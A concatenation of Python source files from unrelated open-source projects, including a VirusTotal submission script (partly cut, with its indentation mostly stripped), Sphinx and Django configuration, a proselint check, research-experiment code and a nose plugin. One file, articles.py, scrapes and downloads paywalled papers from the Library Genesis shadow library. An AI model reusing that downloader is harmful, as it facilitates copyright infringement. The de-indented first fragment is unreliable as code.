self.logger.debug("entered submit_hashes()")
query_count = 0
done_hashes = set()
for md5, sha1 in self.hashes:
tries = 0
            # This loop makes at most 3 attempts to send a scan request
            while tries < 3:
if query_count == self.QUERY_RATE_LIMIT:
self.logger.debug(
"Query limit reached. Sleeping for a min.")
time.sleep(self.ONE_MIN)
query_count = 0
tries += 1
query_count += 1
if self.make_request(md5, sha1):
done_hashes.add((md5, sha1))
break
if len(self.hashes):
self.logger.debug("Submitted the hashes on: %s", date.today())
self.hashes.difference_update(done_hashes)
def update_table_with_report(self, scan_id, report, json):
self.logger.debug("entered update_table_with_report()")
scan_time = report["scan_date"]
scans = report["scans"]
num_av_labels = report["positives"]
trusted_av_labels = 0
for k, v in scans.iteritems():
if v["detected"] is True:
if k in trusted_av_vendors:
trusted_av_labels += 1
scan_time += " UTC"
self.cursor.execute("""
UPDATE virus_total_submissions
SET trusted_av_labels = %s,
num_av_labels = %s,
scan_time = TIMESTAMP WITH TIME ZONE %s,
json = %s
WHERE scan_id = %s and json is NULL""",
(trusted_av_labels, num_av_labels, scan_time,
json, scan_id))
def fetch_reports(self):
self.logger.debug("entered fetch_reports()")
self.cursor.execute("""
SELECT scan_id
FROM virus_total_submissions
WHERE json is NULL and
(LOCALTIMESTAMP - submit_time) > '5 minutes' and
(LOCALTIMESTAMP - submit_time) < '3 days'
ORDER BY submit_time ASC""")
scan_ids = [row[0] for row in self.cursor.fetchall()]
self.logger.debug("fetch_reports(): %s scan reports to be fetched",
len(scan_ids))
query_count = 0
for scan_id in scan_ids:
if query_count == self.QUERY_RATE_LIMIT:
self.logger.debug(
"Query limit reached. Sleeping for a min.")
time.sleep(self.ONE_MIN)
query_count = 0
query_count += 1
try:
json = vt_api.get_vt_report(scan_id)
if not json:
self.logger.debug("No json")
continue
report = simplejson.loads(json)
# Sometimes, we get the old reports wrongly
if (report["response_code"] != 1) or (
report['scan_id'] != scan_id):
self.logger.debug("Response code %s for scan_id %s" %
(report["response_code"], scan_id))
continue
self.update_table_with_report(scan_id, report, json)
except Exception as e:
self.logger.exception(
"Error in fetching report for scan_id %s: %s" % (scan_id, e))
continue
def sleep_for_the_day():
today = date.today()
while today == date.today():
time.sleep(15 * 60)
def vt_submissions_func():
vt_submit = VTSubmissions()
vt_submit.get_hashes_from_db()
while True:
try:
vt_submit.submit_hashes()
vt_submit.fetch_reports()
except Exception as e:
vt_submit.logger.exception(
"Unexpected error! %s \n Sleeping for the rest of the day", e)
sleep_for_the_day()
vt_submit.logger.debug("main(): Sleeping for 15 min.")
time.sleep(vt_submit.ONE_MIN * 15)
today = date.today().strftime("%Y-%m-%d")
if today != vt_submit.today:
vt_submit.today = today
vt_submit.yesterday = (date.today() -
timedelta(days=1)).strftime("%Y-%m-%d")
vt_submit.last_month = (date.today() -
timedelta(days=30)).strftime("%Y-%m-%d")
vt_submit.get_hashes_from_db()
if __name__ == "__main__":
vt_submissions_func()
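# The throttling idiom shared by submit_hashes() and fetch_reports() above,
# condensed for reference (editor's sketch; `items` and `do_query` are
# hypothetical placeholders, not names from this module):
#
#     query_count = 0
#     for item in items:
#         if query_count == QUERY_RATE_LIMIT:
#             time.sleep(ONE_MIN)   # wait out the per-minute quota
#             query_count = 0
#         query_count += 1
#         do_query(item)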
|
phani-vadrevu/amico
|
amico_scripts/vt_submit.py
|
Python
|
bsd-3-clause
| 10,726
|
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)
import djangocms_markitup
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'djangocms-markitup'
copyright = u'2014, Iacopo Spalletti'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = djangocms_markitup.__version__
# The full version, including alpha/beta/rc tags.
release = djangocms_markitup.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'djangocms-markitupdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'djangocms-markitup.tex', u'djangocms-markitup Documentation',
u'Iacopo Spalletti', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangocms-markitup', u'djangocms-markitup Documentation',
[u'Iacopo Spalletti'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'djangocms-markitup', u'djangocms-markitup Documentation',
u'Iacopo Spalletti', 'djangocms-markitup', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
nephila/djangocms-markitup
|
docs/conf.py
|
Python
|
bsd-3-clause
| 8,236
|
import os
import re
import requests
from urllib.parse import urljoin
from rdflib import Graph, RDF, URIRef, Literal, plugin
from rdflib.store import Store
from rdflib.parser import StringInputSource
from os.path import join as pjoin
from .protect import cstring
test_dois = ('10.1016/0097-3165(79)90023-2',
'10.1002/rsa.3240010202',
'10.1016/0095-8956(71)90029-3',
'10.2307/2370675')
generic_headers = {
'Accept-Encoding': 'gzip, deflate, sdch',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive',
}
class IPythonPDF(object):
def _repr_html_(self):
tpl = '<iframe src={0} width={1[0]} height={1[1]}></iframe>'
return tpl.format(self.filename, (1050, 1000))
def _repr_latex_(self):
tpl = r'\includegraphics[width=1.0\textwidth]{{{0}}}'
return tpl.format(self.filename)
class BibItem(IPythonPDF):
def __init__(self, *args, **kwargs):
identifier = URIRef('doi')
self.store = plugin.get('SQLAlchemy', Store)(identifier=identifier)
self.graph = Graph(self.store, identifier=identifier)
self.graph.open(cstring, create=True)
class DOIMetadata(BibItem):
def __init__(self, doi, *args, **kwargs):
super().__init__(*args, **kwargs)
self.doi = Literal(doi)
url = URIRef(pjoin('http://dx.doi.org', doi))
r = requests.get(url, headers={'Accept': 'application/rdf+xml'})
r.raise_for_status()
        self.graph.parse(StringInputSource(r.content), format='xml')
class DOI(DOIMetadata):
"""find and download a pdf for the doi given
>>> DOI('10.1016/0166-218X(92)00170-Q')
"""
headers = generic_headers
headers['Host'] = 'gen.lib.rus.ec'
headers['Referer'] = 'http://gen.lib.rus.ec/scimag/'
url = 'http://gen.lib.rus.ec/scimag/?s={}&journalid=&v=&i=&p=&redirect=1'
def __init__(self, doi, *args, **kwargs):
super().__init__(doi, *args, **kwargs)
self.url = URIRef(self.url.format(self.doi))
r = requests.get(self.url, headers=self.headers)
r.raise_for_status()
self.links = re.compile(r'a href="([^"]+pdf)"').findall(r.text)
link, *links = self.links
r = requests.get(link, stream=True)
self.filename = Literal('.'.join((doi.replace('/','_'), 'pdf')))
with open(self.filename, 'wb') as fd:
for chunk in r.iter_content(1024*10):
fd.write(chunk)
self.path = URIRef(urljoin('file:', pjoin(os.getcwd(), self.filename)))
self.graph.add((self.path, URIRef('http://purl.org/dc/terms/identifier'), self.doi))
self.graph.commit()
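# A minimal usage sketch (editor's addition): DOIMetadata fetches RDF
# metadata only, skipping the PDF download that DOI.__init__ performs.
# It assumes network access, the SQLAlchemy rdflib store configured via
# .protect.cstring, and that the module is imported from its package
# (it uses a relative import, so it cannot run as a bare script).
if __name__ == '__main__':
    meta = DOIMetadata(test_dois[0])
    print(len(meta.graph))  # number of RDF triples fetched for the DOI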
|
douglas-larocca/articles
|
articles/articles.py
|
Python
|
bsd-3-clause
| 2,932
|
# Copyright (c) 2009-2010, Steve 'Ashcrow' Milner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Bindings for models.
"""
__docformat__ = 'restructuredtext'
from django.contrib import admin
from error_capture_middleware.models import Error
class ErrorAdmin(admin.ModelAdmin):
"""
Admin binding for Error to include Notes.
"""
list_display = ('id', 'traceback', 'resolved', 'timestamp')
# Register admin
admin.site.register(Error, ErrorAdmin)
|
enderlabs/django-error-capture-middleware
|
src/error_capture_middleware/admin.py
|
Python
|
bsd-3-clause
| 1,957
|
"""On 'the N word'.
---
layout: post
source: Louis CK
source_url: https://youtu.be/dF1NUposXVQ?t=30s
title: the 'n-word'
date: 2014-06-10 12:31:19
categories: writing
---
Take responsibility with the shitty words you wanna say.
"""
from proselint.tools import existence_check, memoize
@memoize
def check(text):
"""Check the text."""
err = "cursing.nword"
msg = "Take responsibility for the shitty words you want to say."
    items = [
        "the n-word",
    ]
    return existence_check(text, items, err, msg)
|
amperser/proselint
|
proselint/checks/cursing/nword.py
|
Python
|
bsd-3-clause
| 549
|
"""
Experiments of the paper 'The Approximation of the Dissimilarity
Projection' accepted at PRNI2012.
Quantification of the dissimilarity approximation of tractography data
across different prototype selection policies and number of prototypes.
Copyright (c) 2012, Emanuele Olivetti
Distributed under the New BSD license (3-clauses)
"""
import numpy as np
import nibabel as nib
from dipy.tracking.distances import bundles_distances_mam
from dipy.io.dpy import Dpy
from dissimilarity_common import *
if __name__ == '__main__':
np.random.seed(0)
figure = 'small_dataset' # 'big_dataset' #
if figure=='small_dataset':
filename = 'data/subj_05/101_32/DTI/tracks_dti_10K.dpy'
prototype_policies = ['random', 'fft', 'sff']
color_policies = ['ko--', 'kx:', 'k^-']
elif figure=='big_dataset':
filename = 'data/subj_05/101_32/DTI/tracks_dti_3M.dpy'
prototype_policies = ['random', 'sff']
color_policies = ['ko--', 'k^-']
num_prototypes = [3, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50]
iterations = 50
print "Loading tracks."
dpr = Dpy(filename, 'r')
tracks = dpr.read_tracks()
dpr.close()
tracks = np.array(tracks, dtype=np.object)
# tracks = tracks[:100]
print "tracks:", tracks.size
rho = compute_correlation(tracks, bundles_distances_mam, prototype_policies, num_prototypes, iterations)
plot_results(rho, num_prototypes, prototype_policies, color_policies)
|
emanuele/prni2012_dissimilarity
|
dissimilarity_streamlines.py
|
Python
|
bsd-3-clause
| 1,471
|
# -*- coding: utf-8 -*-
import os
import csv
import numpy as np
import dirfiles
from confparser import load_config
import expyriment
from expyriment import design, control, stimuli, io, misc
def launch_protocol(protocol_ini, exp, gender, vs):
# %%
# ======================== LOAD CONFIG.INI FILE ===========================
# Select .ini file for instructions
setting = load_config(protocol_ini)
# %%
# ========================== LOAD INPUT FILES =============================
# Define the pathway of the inputs directory
inputs_path = os.path.abspath(setting["inputs_dir"] + gender +
'/version_' + vs)
print inputs_path
# List input csv files
inputs_filenames = dirfiles.listdir_csvnohidden(inputs_path)
inputs_filenames.sort()
# %%
# ======== WAITS FOR USER TO ENTER BLOCK (AKA RUN) NUMBER TO START ========
# Define number of runs
nb_block = len(inputs_filenames)
# Wait 5 seconds in order to launch input text screen
exp.keyboard.wait(duration=5000)
# Create text input box
ti = io.TextInput(message='Block number:', message_text_size=24,
message_colour=map(int, setting["bcolor"]),
user_text_colour=map(int, setting["ucolor"]),
ascii_filter=misc.constants.K_ALL_DIGITS,
frame_colour=(70, 70, 70))
# Load user's input
while True:
sb = ti.get('0')
# If string is empty
if not sb:
warning_message1 = stimuli.TextLine(setting["wm1"].decode('utf-8'),
text_size=24,
text_colour=(204, 0, 0))
warning_message1.present()
exp.keyboard.wait(misc.constants.K_RETURN, duration=5000)
continue
# If block number introduced is higher than the number of blocks
# preset in config file
elif int(sb) >= nb_block:
warning_message2 = stimuli.TextLine(setting["wm2"].decode('utf-8'),
text_size=24,
text_colour=(204, 0, 0))
warning_message2.present()
exp.keyboard.wait(misc.constants.K_RETURN, duration=5000)
continue
else:
start_block = int(sb)
break
# %%
# ============================== DESIGN ===================================
# Stimuli sequence of the protocol
session_list = [[i for i in csv.reader(open(inputs_filename))]
for inputs_filename in inputs_filenames]
# Define the blocks using expyriment module
block_list = [expyriment.design.Block(name="block%d" % bs)
for bs in np.arange(nb_block)]
# For all blocks in the block list...
for bl in np.arange(nb_block):
# ...add stimuli to the trials and add trials to the blocks
        for l, line in enumerate(session_list[bl]):
# Create a trial
trial = design.Trial()
# Retrieve variables from input files at every trial and
# label them according to what is defined by var_names
for tsf in np.arange(len(setting["var_names"]) - 1):
trial.set_factor(setting["var_names"][tsf],
line[tsf].decode('utf-8'))
trial.set_factor(setting["var_names"][-1],
line[-2].decode('utf-8'))
# Create stimuli...
if line[1] == '0':
# ... (1) for Rest trial,
# (i.e. between encoding and recognition), ...
if line[0] == '+':
fixcross_isi = stimuli.FixCross(size=(30, 30),
line_width=3,
colour=(255, 255, 255))
# Add fixation cross to the trial
trial.add_stimulus(fixcross_isi)
# (2) for Instructions trial, ...
else:
instruction = stimuli.TextLine(line[4].decode('utf-8'),
position=(0, 250),
text_size=56,
text_colour=(255, 153, 51))
question = stimuli.TextLine(line[0].decode('utf-8'),
position=(0, 0),
text_size=58,)
question_reminder = stimuli.TextLine(
line[0].decode('utf-8'), position=(0, 250),
text_size=56, text_colour=(255, 153, 51))
# Add instructions to the trial
trial.add_stimulus(instruction)
trial.add_stimulus(question)
# ... and (3) for active trial.
else:
# Add adjectives to the trial
adjective = stimuli.TextLine(line[0].decode('utf-8'),
text_size=58,
position=(0, 0))
yes_answer = stimuli.TextLine(setting["yes_key_indication"],
position=(-350, -250),
text_size=60)
no_answer = stimuli.TextLine(setting["no_key_indication"],
position=(300, -250),
text_size=60)
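                # NOTE (editor's comment): question_reminder here, and
                # fixcross_isi in the run loop below, are reused from earlier
                # trials in this block, so each input file must list an
                # instruction/rest trial before its first active trial.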
trial.add_stimulus(question_reminder)
trial.add_stimulus(adjective)
trial.add_stimulus(yes_answer)
trial.add_stimulus(no_answer)
# Add trial to run
block_list[bl].add_trial(trial)
# Add block to the experiment
for ad in np.arange(nb_block):
exp.add_block(block_list[ad])
# Print exp. variable names in the log file
exp.data_variable_names = setting["llog_var_names"]
# # %%
# # ================ DEFINE AND PRELOAD SOME STIMULI ======================
# TTL cross
fixcross_ttl = stimuli.FixCross(size=(40, 40), line_width=3,
colour=(255, 255, 0))
fixcross_ttl.preload()
# # Message at the end of each session
blockend_message = stimuli.TextLine(setting["text_end_session"],
text_size=44,
text_colour=(255, 153, 51))
blockend_message.preload()
# # Final message before quitting the experiment
text_end = stimuli.TextBox(str(''.join((setting["text_end_exp_one"],
'\n\n',
setting["text_end_exp_two"]))).decode('utf-8'),
(1000, 1000), position=(0, -400),
text_size=44, text_colour=(255, 153, 51))
text_end.preload()
# # %%
# # ================================ RUN ==================================
# # =======================================================================
# # Starts running the experiment:
# # (1) Present a screen asking for the subject no. (exp.subject) and
# # wait for the RETURN key
# # (2) Create a data file (exp.data)
# # (3) Present the "Ready" screen
# # =======================================================================
control.start(exp, skip_ready_screen=True)
# # =======================================================================
# # Run the protocol
# # =======================================================================
stop = False
found_key = 0
key_totalexp = []
# While "h" key is not pressed, ...
while not stop:
# Loop over all runs
for b, block in enumerate(exp.blocks[start_block:]):
block_no = b + start_block
t_jit = 0
# Display fixation cross that sets the beginning of the experiment
fixcross_ttl.present()
# Wait for TTL
exp.keyboard.wait_char(setting["TTL"])
exp.screen.clear()
exp.screen.update()
# Creates the clock
t0 = misc.Clock()
# Wait INITIALWAIT seconds before the beginning of the trial
fixcross_isi.present()
exp.clock.wait(setting["INITIALWAIT"])
# Loop over all trials within a block
for t, trial in enumerate(block.trials):
# Getter for the time in milliseconds since clock init.
# Time for the beginning of the trial
t_start = t0.time
# Present stimulus
for s, stimulus in enumerate(trial.stimuli):
if len(trial.stimuli) > 1:
if s == 0:
stimulus.present(update=False)
elif s == len(trial.stimuli) - 1:
stimulus.present(clear=False)
else:
stimulus.present(clear=False, update=False)
else:
stimulus.present()
# Jittered duration during rest,
# i.e. between encoding and recognition
if len(trial.stimuli) == 1:
jit_rest = design.randomize.rand_int(10000, 14000)
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=jit_rest)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
                    # Deviation from the 12000 ms mean of rand_int(10000, 14000),
                    # mirroring the 500 ms mean used for the ISI jitter below.
                    diff_mean_rest = 12000 - jit_rest
t_jit = t_jit + diff_mean_rest
# Calculate total duration of the rest period
duration_rest = t0.time - t_start
# Log file registry for rest
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][2]),
t_start, duration_rest])
else:
# Duration of active trials
if len(trial.stimuli) == 4:
key, rt = exp.keyboard.wait_char([setting["YES"],
setting["NO"]],
duration=5000)
t_end = t0.time
t_diff = t_end - t_start
if t_diff < 5000:
exp.clock.wait(5000-t_diff)
# Calculate total duration of the active condition
duration_active = t0.time - t_start
# Log file registry for the active condition
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][1]),
trial.get_factor(setting["var_names"][2]),
trial.get_factor(setting["var_names"][3]),
trial.get_factor(setting["var_names"][4]),
t_start, duration_active, key, rt])
# Duration of instruction trial
else:
found_key, _ = exp.keyboard.wait(
keys=[misc.constants.K_h], duration=5000)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
# Calculate total duration of the instruction
duration_inst = t0.time - t_start
# Log file registry for the instruction trials
exp.data.add([block_no, t,
trial.get_factor(setting["var_names"][0]),
trial.get_factor(setting["var_names"][2]),
t_start, duration_inst])
# Jittered ISI fixation cross
fixcross_isi.present()
jit_isi = design.randomize.rand_int(300, 700)
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=jit_isi)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
diff_mean_isi = 500 - jit_isi
t_jit = t_jit + diff_mean_isi
if stop:
break
# Display fixation cross in the end of the session
fixcross_isi.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_h],
duration=15000 + t_jit)
# If "h" key is pressed, returns to main menu
if found_key == misc.constants.K_h:
stop = True
break
# In the end of each session:
if block_no < (nb_block - 1):
fixcross_isi.present()
# Display message: "End of Session"
blockend_message.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_RETURN,
misc.constants.K_h])
if found_key == misc.constants.K_h:
stop = True
break
# In the end of the experiment:
elif block_no == (nb_block - 1):
fixcross_isi.present()
# Display message: "End of the Experiment"
text_end.present()
found_key, _ = exp.keyboard.wait(keys=[misc.constants.K_RETURN,
misc.constants.K_h],
duration=5000)
# Leave while loop
stop = True
|
hbp-brain-charting/public_protocols
|
self/protocol/protocol.py
|
Python
|
bsd-3-clause
| 14,601
|
from settings import * # flake8: noqa
def create_db():
from django.db import connection
connection.creation.create_test_db(autoclobber=True)
create_db()
from tests.models import * # flake8: noqa
from tests.factories import * # flake8: noqa
for i in range(100): ExampleModelFactory.create()
|
kevinastone/django-cursor-pagination
|
tests/playground.py
|
Python
|
bsd-3-clause
| 305
|
"""
The module is used by the Twisted plugin system
(twisted.plugins.slyd_plugin) to register twistd command to manage
slyd server. The command can be used with 'twistd slyd'.
"""
from os import listdir
from os.path import join, dirname, isfile
from twisted.python import usage
from twisted.web.resource import Resource
from twisted.application.internet import TCPServer
from twisted.web.static import File
from .resource import SlydJsonObjectResource
from .server import Site, debugLogFormatter
DEFAULT_PORT = 9001
DEFAULT_DOCROOT = join(dirname(dirname(__file__)), 'dist')
class Options(usage.Options):
optParameters = [
['port', 'p', DEFAULT_PORT, 'Port number to listen on.', int],
['docroot', 'd', DEFAULT_DOCROOT, 'Default doc root for static media.']
]
class Capabilities(SlydJsonObjectResource):
isLeaf = True
def __init__(self, spec_manager):
self.spec_manager = spec_manager
def render_GET(self, request):
return {
'capabilities': self.spec_manager.capabilities,
'custom': self.spec_manager.customizations,
'username': request.auth_info.get('username'),
}
def create_root(config, settings_module):
from scrapy import log
from scrapy.settings import Settings
from .specmanager import SpecManager
from .authmanager import AuthManager
from .projectspec import create_project_resource
from slyd.bot import create_bot_resource
from slyd.projects import create_projects_manager_resource
root = Resource()
static = Resource()
for file_name in listdir(config['docroot']):
file_path = join(config['docroot'], file_name)
if isfile(file_path):
static.putChild(file_name, File(file_path))
static.putChild('main.html', File(join(config['docroot'], 'index.html')))
root.putChild('static', static)
root.putChild('assets', File(join(config['docroot'], 'assets')))
root.putChild('fonts', File(join(config['docroot'], 'assets', 'fonts')))
root.putChild('', File(join(config['docroot'], 'index.html')))
settings = Settings()
settings.setmodule(settings_module)
spec_manager = SpecManager(settings)
# add server capabilities at /server_capabilities
capabilities = Capabilities(spec_manager)
root.putChild('server_capabilities', capabilities)
# add projects manager at /projects
projects = create_projects_manager_resource(spec_manager)
root.putChild('projects', projects)
# add crawler at /projects/PROJECT_ID/bot
projects.putChild('bot', create_bot_resource(spec_manager))
# add project spec at /projects/PROJECT_ID/spec
spec = create_project_resource(spec_manager)
projects.putChild('spec', spec)
auth_manager = AuthManager(settings)
return auth_manager.protectResource(root)
def makeService(config):
import slyd.settings
root = create_root(config, slyd.settings)
site = Site(root, logFormatter=debugLogFormatter)
return TCPServer(config['port'], site)
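# Usage sketch (editor's addition, illustrative only): once the twisted
# plugin wrapper (twisted.plugins.slyd_plugin, mentioned in the module
# docstring) is on the path, the server can be started with, e.g.:
#
#     twistd -n slyd -p 9002 -d /path/to/dist
#
# where -p and -d map to the 'port' and 'docroot' optParameters above,
# and -n keeps twistd in the foreground.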
|
nju520/portia
|
slyd/slyd/tap.py
|
Python
|
bsd-3-clause
| 3,029
|
"""
A module interface to shapelet functions
"""
__version__ = '0.2' #this needs to be kept up to date with setup.py
import decomp, fileio, img, measure, shapelet
|
griffinfoster/shapelets
|
shapelets/__init__.py
|
Python
|
bsd-3-clause
| 166
|
"""
This plugin captures stdout during test execution, appending any
output captured to the error or failure output, should the test fail
or raise an error. It is enabled by default but may be disable with
the options -s or --nocapture.
"""
import logging
import os
import sys
from nose.plugins.base import Plugin
from nose.util import ln
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
log = logging.getLogger(__name__)
class Capture(Plugin):
"""
Output capture plugin. Enabled by default. Disable with -s or
--nocapture. This plugin captures stdout during test execution,
appending any output captured to the error or failure output,
should the test fail or raise an error.
"""
enabled = True
env_opt = 'NOSE_NOCAPTURE'
name = 'capture'
score = 500
def __init__(self):
self.stdout = []
self._buf = None
def options(self, parser, env=os.environ):
parser.add_option(
"-s", "--nocapture", action="store_false",
default=not env.get(self.env_opt), dest="capture",
help="Don't capture stdout (any stdout output "
"will be printed immediately) [NOSE_NOCAPTURE]")
def configure(self, options, conf):
self.conf = conf
if not options.capture:
self.enabled = False
def afterTest(self, test):
self.end()
self._buf = None
def begin(self):
self.start() # get an early handle on sys.stdout
def beforeTest(self, test):
self.start()
def formatError(self, test, err):
test.capturedOutput = output = self.buffer
self._buf = None
if not output:
# Don't return None as that will prevent other
# formatters from formatting and remove earlier formatters
# formats, instead return the err we got
return err
ec, ev, tb = err
return (ec, self.addCaptureToErr(ev, output), tb)
def formatFailure(self, test, err):
return self.formatError(test, err)
def addCaptureToErr(self, ev, output):
        return '\n'.join([str(ev), ln('>> begin captured stdout <<'),
                          output, ln('>> end captured stdout <<')])
def start(self):
self.stdout.append(sys.stdout)
self._buf = StringIO()
sys.stdout = self._buf
def end(self):
if self.stdout:
sys.stdout = self.stdout.pop()
def finalize(self, result):
while self.stdout:
self.end()
def _get_buffer(self):
if self._buf is not None:
return self._buf.getvalue()
buffer = property(_get_buffer, None, None,
"""Captured stdout output.""")
|
santisiri/popego
|
envs/ALPHA-POPEGO/lib/python2.5/site-packages/nose-0.10.1-py2.5.egg/nose/plugins/capture.py
|
Python
|
bsd-3-clause
| 2,780
|
# -*- coding: utf-8 -*-
